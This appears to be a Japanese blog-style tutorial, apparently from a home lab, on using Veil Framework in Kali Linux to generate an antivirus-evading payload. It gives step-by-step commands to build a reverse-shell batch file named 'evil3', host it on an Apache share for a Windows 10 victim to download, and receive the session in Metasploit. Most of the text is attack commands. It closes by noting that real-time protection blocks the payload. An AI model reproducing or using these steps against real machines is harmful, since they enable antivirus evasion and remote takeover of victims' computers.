Veil Framework

Veil Framework

Meterpreter セッションの確立には
ターゲット端末で実行ファイルを実行させ
アンチウイルスの検知の回避が必要

Veil Framework は
アンチウイルス回避ペイロードを生成するツール

KaliLinux にインストールするには

apt install veil-evasion 
veil

で起動すると
セットアップスクリプトが実行され

 [?] Are you sure you wish to install Veil?

     Continue with installation? ([y]es/[s]ilent/[N]o): 

となり
インストールモードを選ぶので
s を入力し Enter

インストールが終わって
veil >
と表示されたら

exit

で一度終了しておく

再度

veil

で起動し
Veil を最新化するために

update

でVeil を最新化する

現在使えるツールは
Evasion
Ordnance
の2つ

アンチウイルスを回避するツールを使うなら
Evasion なので

use 1

ペイロードリストをみたいのなら

list

を実行するとみれる

今回はこの中から22のものを使うので

use 22

を実行

どのようなツールかは
Description の項目にかかれている

これはリバースシェルなので
KaliLinux のIPをセット

set lhost 192.168.1.134

次にペイロードの作成

generate

を実行

するとファイル名を指定できるので
evil3
としておく

Hit enter to continue...

となったら Enter

これで作成はできたので

exit

で一度終了

ここで作成できたファイルは
一度デスクトップへコピーしておく

cp /var/lib/veil/output/source/evil3.bat /root/Desktop/
cp /root/Desktop/evil3.bat /var/www/html/share/
service apache2 restart

でダウンロードできるようにしておく

次にリバースシェルの待受設定

msfconsole 

で Metasploit を起動

これで Windows10 でブラウザから
evil3 をダウンロードし
実行すると
コマンドプロンプトが立ち上がり
セッションが確立される

ただしリアルタイム保護が有効化されていると
ダウンロードもできないし
実行時に検知されセッションは確立できない